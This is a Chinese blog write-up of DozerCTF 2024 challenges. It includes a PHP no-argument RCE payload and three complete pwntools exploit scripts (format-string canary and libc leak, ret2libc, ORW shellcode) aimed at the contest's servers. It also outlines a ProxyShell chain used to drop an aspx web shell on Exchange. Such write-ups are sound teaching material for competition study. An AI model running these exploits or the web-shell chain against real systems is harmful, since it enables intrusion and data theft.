2024Dozercrtf WP

最新推荐文章于 2024-06-24 10:17:56 发布
最新推荐文章于 2024-06-24 10:17:56 发布
阅读量92 收藏 1
点赞数 1
分类专栏: 比赛 文章标签: php 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/akxnxbshai/article/details/138294950
版权

好久没打比赛,唉,没手感了。

easy_rce

无参rce,常规操作:
Payload: cmd=print_r(file(array_rand(array_flip(scandir(pos(localeconv()))))));
有随机性,多试几次即可。
在这里插入图片描述

得到flag为:Dozerctf{2jvZJ1aqT9suBr02u8S5ePnZsKenIEhT}

Pwn_fclos

格式化字符串漏洞泄露libc和canary就行了。Close1和2但是没关0.所以改重定向到0就可以cat flag了
在这里插入图片描述

from pwn import *
from struct import pack
from ctypes import *
from LibcSearcher import *
import base64
import gmpy2
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
def s(a):
    p.send(a)
def sa(a, b):
    p.sendafter(a, b)
def sl(a):
    p.sendline(a)
def sla(a, b):
    p.sendlineafter(a, b)
def r():
    p.recv()
def pr():
    print(p.recv())
def rl(a):
    return p.recvuntil(a)
def inter():
    p.interactive()
def bug():
    gdb.attach(p)
    pause()
def get_addr():
    return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def get_sb():
    return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))

context(os='linux', arch='amd64', log_level='debug')
#p = process('./pwn1')
p = remote('139.196.237.232', 32857)
elf = ELF('./pwn1')
libc=ELF("/root/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/libc-2.27.so")
#libc = ELF('./libc-2.31.so')

rl("What is your username?\n")
pay=b'%37$p%35$p'
#bug()
sl(pay)

rl("0x")
libc_base=int(p.recv(12),16)-libc.sym['__libc_start_main']-231
li(hex(libc_base))
rl("0x")
can=int(p.recv(16),16)
li(hex(can))

system,bin=get_sb()
rdi = libc_base+libc.search(asm("pop rdi\nret")).__next__()
payload=b'a'*(0xd0-8)+p64(can)*2+p64(rdi)+p64(bin)+p64(rdi+1)+p64(system)
pause()
s(payload)

inter()

pyyyyy

反编译之后分析

flag = input('input your flag:\n')
if len(flag) != 14:
    pass
exit()
nums = []
for i in range(14):
    nums.append(ord(flag[i]))

if (((((nums[0] * 2 + nums[1] - 4 - nums[2] * 3 - nums[3] - 3) + nums[4] * 5 + nums[5] * 5 - nums[6] - 3) + nums[7] + 2 - nums[8]) + 3 + nums[9] - 3 - nums[10] * 4) + nums[11] * 3 - nums[12] - 2) + nums[13] + 3 == 56 and ((((nums[0] + 2 - nums[1] * 5) + nums[2] - 3 - nums[3]) + 5 - nums[4] * 4 - nums[5]) + 5 + nums[6] * 4 + nums[7] * 5 + nums[8] * 3 + nums[9] * 5 - nums[10] - 5 - nums[11] - 2 - nums[12] - 5) + nums[13] - 3 == 681 and (((nums[0] * 5 + nums[1] * 3 - nums[2] - 2) + nums[3] * 4 + nums[4] - 3) + nums[5] * 4 + nums[6] * 4 + nums[7] + 3 - nums[8] * 2 - nums[9]) + 3 + nums[10] + 3 - nums[11] * 2 - nums[12] * 3 - nums[13] * 2 == 1129 and (((((nums[0] * 5 - nums[1] - 2) + nums[2] - 2) + nums[3] + 5 - nums[4]) + 3 + nums[5] * 2 + nums[6] + 2 - nums[7] * 4 - nums[8] - 2) + nums[9] + 5 + nums[10] + 4 - nums[11]) + 3 + nums[12] + 3 - nums[13] * 5 == 55 and ((((nums[0] + 2 - nums[1] * 4 - nums[2] * 3) + nums[3] + 3 + nums[4] * 4 + nums[5] * 3 - nums[6]) + 5 + nums[7] - 2 - nums[8]) + 5 + nums[9] * 4 - nums[10] - 2 - nums[11] - 4) + nums[12] * 5 - nums[13] - 4 == 673 and (((((nums[0] - 5 - nums[1] - 4 - nums[2] - 4 - nums[3]) + 2 + nums[4] * 4 - nums[5]) + 4 + nums[6] + 3 + nums[7] + 5 - nums[8] * 5 - nums[9]) + 2 + nums[10] + 2 + nums[11] - 2) + nums[12] * 3 - nums[13]) + 4 == 249 and ((((((nums[0] * 4 + nums[1] - 4) + nums[2] - 5) + nums[3] - 2 - nums[4] * 2) + nums[5] + 3 + nums[6] - 3 - nums[7]) + 3 - nums[8] * 4 - nums[9] * 3) + nums[10] * 2 + nums[11] * 5 + nums[12] - 4) + nums[13] - 4 == 422 and ((((((nums[0] * 3 - nums[1] - 3 - nums[2] - 3) + nums[3] - 2 - nums[4] - 5) + nums[5] * 2 + nums[6] - 4) + nums[7] - 5) + nums[8] * 5 - nums[9] * 3 - nums[10]) + 5 - nums[11] - 4 - nums[12] * 5) + nums[13] - 4 == 49 and (((((((nums[0] - 4 - nums[1]) + 3 - nums[2]) + 4 - nums[3] - 4) + nums[4] + 5 - nums[5] * 3) + nums[6] + 2 + nums[7] * 4 - nums[8] - 4 - nums[9]) + 3 - nums[10] * 5) + nums[11] * 2 + nums[12] * 3 - nums[13]) + 2 == 0 and (((((((nums[0] - 5 - nums[1]) + 5 - nums[2] - 4) + nums[3] + 3 + nums[4] - 2) + nums[5] - 4) + nums[6] * 2 - nums[7] - 4 - nums[8] * 4) + nums[9] + 4 + nums[10] * 4 - nums[11]) + 5 - nums[12]) + 4 + nums[13] + 4 == 268 and ((((((nums[0] - 5 - nums[1]) + 3 - nums[2]) + 2 + nums[3] - 4 - nums[4]) + 4 + nums[5] - 5 - nums[6]) + 2 + nums[7] - 4 - nums[8] - 5 - nums[9] - 5 - nums[10] - 2 - nums[11]) + 5 + nums[12] - 3) + nums[13] + 4 == -162 and ((((((((nums[0] + 5 - nums[1]) + 4 + nums[2] * 5 - nums[3] - 3) + nums[4] - 5 - nums[5] - 5) + nums[6] + 3 - nums[7] * 5 - nums[8] * 3) + nums[9] - 4) + nums[10] - 2) + nums[11] - 3) + nums[12] - 5) + nums[13] + 2 == -2 and ((((nums[0] + 4 + nums[1] - 5 - nums[2]) + 3 + nums[3] + 3 - nums[4] - 4 - nums[5]) + 3 + nums[6] - 3 - nums[7] - 5 - nums[8]) + 3 + nums[9] - 5 - nums[10] - 2) + nums[11] + 5 + nums[12] * 5 - nums[13] - 5 == 433 and (((((nums[0] + 4 + nums[1] + 4 + nums[2] + 3 - nums[3] - 2) + nums[4] - 4) + nums[5] + 3 - nums[6] - 4 - nums[7] * 2) + nums[8] - 3) + nums[9] + 2 + nums[10] * 3 - nums[11] * 4) + nums[12] + 5 + nums[13] * 3 == 515:
    pass
print('good job')

z3求解即可

脚本如下:

In [17]: nums = [Int('a%02i'%i) for i in range(14)]

In [18]: s= Solver()

In [19]: s.add((((((nums[0] * 2 + nums[1] - 4 - nums[2] * 3 - nums[3] - 3) + nums[4] * 5 + nums[5]
    ...: * 5 - nums[6] - 3) + nums[7] + 2 - nums[8]) + 3 + nums[9] - 3 - nums[10] * 4) + nums[11] *
    ...:  3 - nums[12] - 2) + nums[13] + 3 == 56 , ((((nums[0] + 2 - nums[1] * 5) + nums[2] - 3 - n
    ...: ums[3]) + 5 - nums[4] * 4 - nums[5]) + 5 + nums[6] * 4 + nums[7] * 5 + nums[8] * 3 + nums[
    ...: 9] * 5 - nums[10] - 5 - nums[11] - 2 - nums[12] - 5) + nums[13] - 3 == 681 , (((nums[0] *
    ...: 5 + nums[1] * 3 - nums[2] - 2) + nums[3] * 4 + nums[4] - 3) + nums[5] * 4 + nums[6] * 4 +
    ...: nums[7] + 3 - nums[8] * 2 - nums[9]) + 3 + nums[10] + 3 - nums[11] * 2 - nums[12] * 3 - nu
    ...: ms[13] * 2 == 1129 , (((((nums[0] * 5 - nums[1] - 2) + nums[2] - 2) + nums[3] + 5 - nums[4
    ...: ]) + 3 + nums[5] * 2 + nums[6] + 2 - nums[7] * 4 - nums[8] - 2) + nums[9] + 5 + nums[10] +
    ...:  4 - nums[11]) + 3 + nums[12] + 3 - nums[13] * 5 == 55 , ((((nums[0] + 2 - nums[1] * 4 - n
    ...: ums[2] * 3) + nums[3] + 3 + nums[4] * 4 + nums[5] * 3 - nums[6]) + 5 + nums[7] - 2 - nums[
    ...: 8]) + 5 + nums[9] * 4 - nums[10] - 2 - nums[11] - 4) + nums[12] * 5 - nums[13] - 4 == 673
    ...: , (((((nums[0] - 5 - nums[1] - 4 - nums[2] - 4 - nums[3]) + 2 + nums[4] * 4 - nums[5]) + 4
    ...:  + nums[6] + 3 + nums[7] + 5 - nums[8] * 5 - nums[9]) + 2 + nums[10] + 2 + nums[11] - 2) +
    ...:  nums[12] * 3 - nums[13]) + 4 == 249 , ((((((nums[0] * 4 + nums[1] - 4) + nums[2] - 5) + n
    ...: ums[3] - 2 - nums[4] * 2) + nums[5] + 3 + nums[6] - 3 - nums[7]) + 3 - nums[8] * 4 - nums[
    ...: 9] * 3) + nums[10] * 2 + nums[11] * 5 + nums[12] - 4) + nums[13] - 4 == 422 , ((((((nums[0
    ...: ] * 3 - nums[1] - 3 - nums[2] - 3) + nums[3] - 2 - nums[4] - 5) + nums[5] * 2 + nums[6] -
    ...: 4) + nums[7] - 5) + nums[8] * 5 - nums[9] * 3 - nums[10]) + 5 - nums[11] - 4 - nums[12] *
    ...: 5) + nums[13] - 4 == 49 , (((((((nums[0] - 4 - nums[1]) + 3 - nums[2]) + 4 - nums[3] - 4)
    ...: + nums[4] + 5 - nums[5] * 3) + nums[6] + 2 + nums[7] * 4 - nums[8] - 4 - nums[9]) + 3 - nu
    ...: ms[10] * 5) + nums[11] * 2 + nums[12] * 3 - nums[13]) + 2 == 0 , (((((((nums[0] - 5 - nums
    ...: [1]) + 5 - nums[2] - 4) + nums[3] + 3 + nums[4] - 2) + nums[5] - 4) + nums[6] * 2 - nums[7
    ...: ] - 4 - nums[8] * 4) + nums[9] + 4 + nums[10] * 4 - nums[11]) + 5 - nums[12]) + 4 + nums[1
    ...: 3] + 4 == 268 , ((((((nums[0] - 5 - nums[1]) + 3 - nums[2]) + 2 + nums[3] - 4 - nums[4]) +
    ...:  4 + nums[5] - 5 - nums[6]) + 2 + nums[7] - 4 - nums[8] - 5 - nums[9] - 5 - nums[10] - 2 -
    ...:  nums[11]) + 5 + nums[12] - 3) + nums[13] + 4 == -162 , ((((((((nums[0] + 5 - nums[1]) + 4
    ...:  + nums[2] * 5 - nums[3] - 3) + nums[4] - 5 - nums[5] - 5) + nums[6] + 3 - nums[7] * 5 - n
    ...: ums[8] * 3) + nums[9] - 4) + nums[10] - 2) + nums[11] - 3) + nums[12] - 5) + nums[13] + 2
    ...: == -2 , ((((nums[0] + 4 + nums[1] - 5 - nums[2]) + 3 + nums[3] + 3 - nums[4] - 4 - nums[5]
    ...: ) + 3 + nums[6] - 3 - nums[7] - 5 - nums[8]) + 3 + nums[9] - 5 - nums[10] - 2) + nums[11]
    ...: + 5 + nums[12] * 5 - nums[13] - 5 == 433 , (((((nums[0] + 4 + nums[1] + 4 + nums[2] + 3 -
    ...: nums[3] - 2) + nums[4] - 4) + nums[5] + 3 - nums[6] - 4 - nums[7] * 2) + nums[8] - 3) + nu
    ...: ms[9] + 2 + nums[10] * 3 - nums[11] * 4) + nums[12] + 5 + nums[13] * 3 == 515)

In [20]:

In [20]: for i in range(14):
    ...:     s.add(nums[i]<=126)
    ...:     s.add(nums[i]>=32)
    ...:

In [21]: s.check()
Out[21]: sat

In [22]: s.model()
Out[22]:
[a07 = 116,
 a13 = 51,
 a03 = 121,
 a10 = 110,
 a04 = 95,
 a12 = 122,
 a02 = 98,
 a05 = 53,
 a08 = 104,
 a09 = 48,
 a11 = 38,
 a06 = 121,
 a00 = 66,
 a01 = 64]

ez_pwn

撞随机值,然后打ret2libc就可以了
在这里插入图片描述
比赛的时候打不通,写了这个爆破的,但是还是打不通,后来再试有打通了,那就用这个脚本吧

from pwn import *
from struct import pack
from ctypes import *
import ctypes
from LibcSearcher import *
import base64
import gmpy2
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
def s(a):
    p.send(a)
def sa(a, b):
    p.sendafter(a, b)
def sl(a):
    p.sendline(a)
def sla(a, b):
    p.sendlineafter(a, b)
def r():
    p.recv()
def pr():
    print(p.recv())
def rl(a):
    return p.recvuntil(a)
def inter():
    p.interactive()
def bug():
    gdb.attach(p)
    pause()
def get_addr():
    return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def get_sb():
    return libc_base + libc2.sym['system'], libc_base + next(libc2.search(b'/bin/sh\x00'))

context(os='linux', arch='amd64', log_level='debug')
#p = process('./pwn2')
p = remote('139.196.237.232', 32891)
elf = ELF('./pwn2')
libc2=ELF("./libc.so.6")
#libc = ELF('./libc-2.31.so')
for i in range(10):
	try:
		p = remote('139.196.237.232', 32891,timeout=0.5)
		rdi=0x00000000004014d3
		bss=0x4040A0+0x800

		rl("Welcome to the simple authentication system\n\n")

		elf1=ctypes.CDLL("/lib/x86_64-linux-gnu/libc.so.6")
		elf1.srand(elf1.time(0))    #与题目相同以时间为种子
		payload = str(elf1.rand())


		rl("Enter your account:")
		s(b'a')


		rl("Enter your password:")
		sl(payload)


		rl("leave something\n")
		pay=b'a'*0x30+p64(bss)+p64(rdi)+p64(elf.got['read'])+p64(elf.plt['puts'])+p64(0x401190)
		#bug()
		s(pay)

		libc_base=get_addr()-libc2.sym['read']
		li(hex(libc_base))
		system,bin=get_sb()


		rl("Welcome to the simple authentication system\n\n")

		libc = cdll.LoadLibrary('./libc.so.6')
		srand = libc.srand(libc.time(0))
		a=str(libc.rand()).encode()

		rl("Enter your account:")
		s(b'a')


		rl("Enter your password:")
		sl(a)

		rl("leave something\n")
		pay=b'a'*0x30+p64(bss)+p64(rdi)+p64(bin)+p64(rdi+1)+p64(system)
		#bug()
		s(pay)
		inter()
	except:
		p.close()

inter()

mid_pwn

没有种子,随机值固定的,然后调试一下,发现是第0xe7个开始执行shellcode
然后构造openat,readv,writev即可
在这里插入图片描述
在这里插入图片描述

from pwn import *
from struct import pack
from ctypes import *
from LibcSearcher import *
import base64
import gmpy2
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
def s(a):
    p.send(a)
def sa(a, b):
    p.sendafter(a, b)
def sl(a):
    p.sendline(a)
def sla(a, b):
    p.sendlineafter(a, b)
def r():
    p.recv()
def pr():
    print(p.recv())
def rl(a):
    return p.recvuntil(a)
def inter():
    p.interactive()
def bug():
    gdb.attach(p)
    pause()
def get_addr():
    return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def get_sb():
    return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))

context(os='linux', arch='amd64', log_level='debug')
#p = process('./pwn3')
p = remote('139.196.237.232', 32920)
elf = ELF('./pwn3')
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
#libc = ELF('./libc-2.31.so')

orw=asm('''
mov r8,0x403500
mov r9,0x403600
mov r10,0x100
mov qword ptr [r8] , r9
mov qword ptr [r8+8] , r10

''')

orw+=asm(shellcraft.openat(3,"/flag"))
orw+=asm(shellcraft.readv(3,0x403500,1))
orw+=asm(shellcraft.writev(1,0x403500,1))

rl("\nshow me\n")
shellcode=b'a'*0xe7+orw
#bug()
sl(shellcode)

inter()

简单的域渗透III-flag1

打exchange组合拳
Exchange ProxyShell复现-CSDN博客
proxyshell利用链由下述三个cve组成:
— CVE-2021-34473 - 一个ssrf漏洞
— CVE-2021-34523 - Exchange PowerShell BackEnd提权
— CVE-2021-31207 - 认证后任意文件写入漏洞
跟着走即可,但是也有一些不一样的地方,邮箱名提示是dashe
在这里插入图片描述
猜测出来邮箱为dashe@exchange.lab
获取sid
在这里插入图片描述
然后计算token,发送邮件。
在这里插入图片描述
最后直接用save_shell脚本,上传2.aspx
最后在C:\Users\BitsAdmin\Desktop\vpnConfig.zip发现压缩包,里边有password,flag就在里边。
在这里插入图片描述
得到flag为:Dozerctf{b5c1cd1c-45d8-4c5e-bf2e-d2b87419248f}

Se

音频存在按键,dtmf2num识别一下得到962764453
在这里插入图片描述
Silenteye隐写解压密码就是上边的num
在这里插入图片描述
得到flag
在这里插入图片描述

shuiyin

下载附件得到flag
在这里插入图片描述

temp

rc4,patch输入为密文动调拿到key

from ida_bytes import *
enc=[0x15, 0xD6, 0x03, 0x08, 0x7A, 0x85, 0x13, 0xFE, 0x40, 0x33, 
  0x4F, 0x06, 0xBA, 0x59, 0xB9, 0xBC, 0x7F, 0x2B, 0xB1, 0x94, 
  0xDC, 0x28, 0x6D, 0xDF, 0x8E, 0xA5, 0xF9, 0x97, 0x78, 0x96, 
  0x06, 0xAE, 0x11]
patch_bytes(0x0159BF7FD38,bytes(enc))

在这里插入图片描述
对what中的密文解密拿到flag

enc=list(open("what","rb").read())
key="you_really_think_it_is_such_easy?"
for i in range(len(enc)):
    enc[i]^=(i+ord(key[i]))
print("".join(map(chr,enc)))

strange_code

wav是摩斯电码,在线网站提取一下
https://morsecode.world/international/decoder/audio-decoder-adaptive.html
HINT:IT’SSOUNDSLIKEHIDESOMEKINDOFELECTRONICSENCRYPTIONCE.-.BT—… —.-.WT-… .-----… .-…—.-. -.-…—. -…----… .-…----. .–…—. …-----… —.-…-. --…-…–RU .-.-…—. .-.--…-. -.-…—… .—.-.-… .–…-.-. .-.-…—. .-.—…6E. …—.–. -…-.-.–. —.-…-. .-…–.--. -.-…—. —… …-----
在这里插入图片描述
-换成+,.换成-
https://www.dcode.fr/decabit-code
解密得到flag
DozerCTF{n0t_just_b1nary}

问卷

在这里插入图片描述
Dozerctf{welcome_to_DozerCTF2024_by_Ed}

f0njl
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
华三H3C WP2024 POE交换机PSE版本210文件
01-11
华三H3C WP2024 POE交换机PSE版本210文件,用于解决端口异常断电、无法供电等问题。
封面应用WP7
04-02
这是封面应用WP7源码,也是Windows Phone 7封面应的一个实例,可以实现项目演示影片效果,和一些书籍等封面效果,该界面不但可以实现左右滚动,而且效果很不错,喜欢wp开发的朋友可以下载学习一下。
蓝桥杯ctf2024 部分wp
Pisces50002的博客
04-28 829
【代码】蓝桥杯ctf2024 部分wp
DozerCTF2024部分wp
2301_78871310的博客
04-29 466
由小队共同完成,放在我博客上。
2024年盘古石杯服务器取证wp
qq_51233573的博客
05-12 1533
由此可以判断黑客通过/Home/User/tkpwdpost.html 存在的sql注入将上传接口tmpugklv.php写到网站的根目录下 再通过上传接口将一句话木马上传。根据修改时间判断也是后续上传上去的文件 继续向前回溯 18时51分48秒的时候通过sql注入将tmpugklv.php 写道网站当中。再将sql文件导入数据分析工具当中 查看userlog表 结合受害人的聊天记录可以判断受害人第一次成功登录网站的时间为。根据导出的数据库备份文件可以看出 数据库表的前缀 think_
第十七届全国大学生信息安全竞赛创新实践能力赛初赛(CISCN-2024部分WP
Welcome To Myon'Blog !
05-20 1923
给的 e 其实就是 d,只是结果是移位后的输出,n 很大无法分解,但 kk 与 rr 很小,由 rr= e//n 即可推出 rr 和 kk,又由 e + x + kk*p + rr*((p+1)* (q+1))+ 1 = 65537,将 × 设为 0 和 2^200 然后联立求解一元二次方程,就能求出 p, q 的上下界,这样就有p 和q 的高位,枚举未知位尝试coppersmith 直到分解出结果,最后代入求 e 和 d,进而求得flag。
【青少年CTF】2024wp(部分)
C00K1E
02-13 1867
下载附件拿到:熊曰:呋食食物嘍嗷洞出嗚有眠哮山囑眠拙住訴嗚囑肉拙既寶果動我笨會你出眠嚄寶冬食喜哞吖山噗食類囑出果你盜唬動取噔唬噤樣魚呦爾。 是我的Hanser!凯撒大帝的征讨之路Whale神奇的压缩包表情包上号在最下方访问8000端口的网页的时候,请求了shanghao.zip文件 ,把文件导出,点击save。 stegslove打开,在文件末尾发现qsnctf,再使用steghide(隐写术软件)工具,进行解密
2024云曦期中考核wp
2301_80913334的博客
05-19 855
直接打开源代码,发现js文件打开发现一串疑似flag的base64编码解码得到flag附赠彩蛋。
2024蓝桥杯网络安全部分赛题wp
qq_74806534的博客
05-08 1004
选择左侧aes 解密,然后复制对应的key,选择input为hex,output为raw 4da72144967f1c25e6273950bf29342aae635e2396ae17c80b1bff68d90f16679bb45c15852e0ce88d4864d93e9e3be2。RC4 是一种对称密钥加密算法,因此加密和解密使用相同的密钥。"gamelab@" 是一个 8 字节长的密钥。#计算了 y1 和 y2 的 SHA-1 哈希,并将它们转换为整数 h1 和 h2。,这是签名过程中使用的临时密钥。
2024高校网络安全管理运维赛wp
toto的博客
05-07 3153
给了login的patch,没一点过滤,考虑普通用户登陆之后新建一个ADMIN,然后直接利用$toLower去覆盖admin的mongo集合。后面没有什么地方有有用信息了,根据题目钓鱼邮件,可能第三段flag就跟DMARC、DKIM 和 SPF有关了。可以先用fqlite看一遍,大概就可以看出flag是根据sort排的,(当然这一步没有问题也不是很大)解析一下主域名,得到提示有三段flag,估计就对应DMARC、DKIM 和 SPF三种方法了。定位到数据部分之后,一眼看到flag数据,接着就是顺序问题了。
WP插件-站长必备免费WP插件
qq_787143156的博客
01-18 2547
如何利用WP插件做好SEO(搜索引擎优化)作为寻找新客户的关键策略。通过创建满足搜索条件并回答您的潜在客户提出的问题的内容,您就有机会赢得网站访问者并赢得他们的信任,SEO提供了丰富的见解、涉及链接构建、搜索引擎排名和关键字访问量。 利用WP插件可以为提高网站搜索引擎排名,如果您希望您的网站在Google、百度、Bing和Yahoo结果页面中快速轻松地出现,当您定期向网站介绍新的SEO内容时,搜素引擎会奖励您的努力和关心。如果网站与搜索字词相关且相关,则获得一致流量的几率会大大提高,并且可以理解.
第十七届全国大学生信息安全竞赛 CISCN 2024 创新实践能力赛初赛 Web方向 部分题解WP
Jay17的博客
05-19 3626
第十七届全国大学生信息安全竞赛 CISCN 2024 创新实践能力赛初赛 Web方向 部分题解WP
Wp.rar_wp
09-14
简单实用的butterworth滤波器设计,很好用
WP7连连看游戏
04-02
该源码实现一款现在很流行的一种游戏,WP7连连看游戏,游戏玩法很简单,只要我们需要找到相同的两张牌用三根以内的直线连在一起就可以消除,非常好玩,并且游戏的源码比较齐全,喜欢wp游戏开发的朋友可以下载学习看...
wp实现一键锁屏功能
04-04
WP8的时候,关于如何关闭屏幕,国内外都有不少文章了,大家有兴趣地可以搜搜,很多,我就不给链接了,因为稍后我的例子中会有。 其实,关闭屏幕是调用了未开放的API,正因为这个API未开放的,不敢保证所有机型都能...
梅花易数排盘 api数据接口
最新发布
尘中客的博客
06-24 74
什么是梅花易数:梅花易数为北宋易学家邵雍所传,因观梅知易数而得名。以卦象生克为主,而不分析爻象。是为梅花易数预测。
k8s解决java服务下载超时问题
云深海阔专栏
06-18 238
我们在走ingress的java程序的时候,往往会有导出数据的功能,这个时候就会有因网络慢、后台处理时间过长导致下载超时,也有因下载文件太大,导致下载失败,综合解决办法如下。1)更改反向代理超时时间。
深入了解PHP的If...Else语句
Perfect—完美的博客
06-20 398
if…else语句用于根据条件执行不同的代码块。if (条件) {// 当条件为真时执行的代码} else {// 当条件为假时执行的代码if…else语句是PHP中最基础也是最重要的控制结构之一。通过使用if、if…else、if…elseif…else以及嵌套if语句,可以实现复杂的条件判断逻辑。条件运算符和switch语句提供了更加简洁和高效的代码写法。掌握这些控制结构的用法,将有助于你编写更加灵活和健壮的PHP代码。
限制操作 killw3wp
12-30
killw3wp 是一种用于终止运行中的 w3wp.exe 进程的命令。w3wp.exe 是由 IIS (Internet Information Services) 使用的工作进程进程,它负责处理和执行网站上的请求。无论是在开发环境还是生产环境中,都需要小心操作 killw3wp 命令,因为它可能引起网站宕机或者丢失数据。 在使用 killw3wp 命令时,需要先确认是否存在需要终止的 w3wp.exe 进程,并且需要确保没有重要的请求或数据正在处理中。一般情况下,killw3wp 命令会被用来解决 w3wp.exe 进程异常或者占用资源过高的问题。在执行 killw3wp 命令前,需要仔细分析并确认是否需要终止该进程,并考虑到可能带来的影响。 在生产环境中,终止 w3wp.exe 进程可能会导致网站服务中断,从而给用户带来不良体验。因此,在执行 killw3wp 命令前,需要提前通知用户或者进行灰度发布、故障演练等操作,以减少影响。同时,需要在终止 w3wp.exe 进程后及时进行故障排除,确保网站服务能够快速恢复正常。 总的来说,限制操作 killw3wp 是十分必要的,需要谨慎使用,尤其是在生产环境中。在使用该命令前应该充分了解其影响,并在必要时进行备份和风险评估,以确保网站服务的稳定和数据的安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

f0njl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值